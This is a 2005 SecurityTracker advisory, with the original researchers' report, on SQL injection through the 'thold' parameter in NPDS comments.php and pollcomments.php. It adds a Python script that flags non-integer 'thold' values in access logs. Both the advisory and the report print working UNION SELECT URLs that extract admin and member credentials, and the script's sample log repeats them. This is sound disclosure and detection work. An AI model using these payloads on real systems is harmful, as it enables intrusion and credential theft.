NPDS Input Validation Holes in 'comments.php' and 'pollcomments.php' Permit SQL Injection

SecurityTracker Alert ID: 1013973
SecurityTracker URL: http://securitytracker.com/id?1013973
CVE Reference: GENERIC-MAP-NOMATCH
Date: May 16 2005
Impact: Disclosure of system information, Disclosure of user information, User access via network
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes

Description: Romano, Benjilenoob, and NoSP reported several input validation vulnerabilities in NPDS. A remote user can inject SQL commands.

The 'comments.php' and 'pollcomments.php' scripts do not properly validate user-supplied input in the 'thold' parameter. A remote user can supply specially crafted parameter values to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors
http://[target]/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users
http://[target]/npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors
http://[target]/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20u

Impact: A remote user can execute SQL commands on the underlying database.
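
A log check for the 'thold' injection described above, as an added example that is not part of the original advisory or of NPDS: it flags requests to the two affected scripts whose decoded 'thold' value is not a plain integer. The integer-only rule for 'thold', the access log format, and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script and parameter names come from the advisory.
AFFECTED_SCRIPTS = {"comments.php", "pollcomments.php"}
PARAM = "thold"
# Assumption: a legitimate thold is a short signed integer.
VALID_THOLD = re.compile(r"-?\d{1,4}\Z")
# Request field of a common/combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_thold(log_line):
    """Return the decoded thold value when a request to an affected script
    carries a non-integer thold; otherwise return None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if url.path.rsplit("/", 1)[-1].lower() not in AFFECTED_SCRIPTS:
        return None
    # parse_qs percent-decodes once and maps '+' to a space; blank values
    # (e.g. "mode=&order=") are dropped, so an empty thold is not flagged.
    for value in parse_qs(url.query).get(PARAM, []):
        if not VALID_THOLD.match(value.strip()):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_thold) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_thold(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log lines (documentation IP addresses, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/May/2005:10:00:01 +0200] "GET /npds/comments.php?sid=12&thold=0 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [16/May/2005:10:00:05 +0200] "GET /npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors HTTP/1.1" 200 7342',
    '192.0.2.77 - - [16/May/2005:10:00:09 +0200] "GET /npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0+union+select+1 HTTP/1.1" 200 4410',
    '192.0.2.10 - - [16/May/2005:10:00:12 +0200] "GET /npds/article.php?sid=1254&thold=0 HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-integer thold -> {value!r}")
```

Parameters sent in a POST body do not appear in access logs, so this check only covers values passed in the query string.
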
Solution: The vendor has issued a fix (using the new 'protect_url.php' file), described at:
http://www.npds.org/article.php?sid=1254&thold=0
Vendor URL: www.npds.org/
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: NoSP <NoSP@thehackademy.net>
Message History: None.

Source Message Contents

Date: Sun, 15 May 2005 19:35:08 +0200
From: NoSP <NoSP@thehackademy.net>
Subject: SQL injection in NPDS
Category: Application (Multimedia) > CMS-NPDS
Vendors: www.npds.org
Title : Inject SQL command in pollcomments.php & comments.php
Date: May 15 2005
Impact: Disclosure of authentication information, Disclosure of user
information, ...
Fix Available: Yes
Solution : use protect_url.php (see www.npds.org for more details)
Description : Romano, Benjilenoob and NoSP reported several vulnerabilities in
NPDS. A remote user can inject SQL commands in $thold variable from
comments.php or pollcomments.php.
The scripts do not properly filter the user-supplied $thold variable.
Some demonstration exploit URLs are provided:
Disclosure login/pass admin
http://localhost/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors
Disclosure login/pass members
http://localhost/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users
Disclosure login/pass admin
http://localhost/npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors
Disclosure login/pass members
http://localhost/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users
Reported By: "Romano" <romano_45 AT hotmail_DOT_com, "NoSP" <NoSP AT
thehackademy DOT net> "Benjilenoob" <benjilenoob AT hotmail DOT com>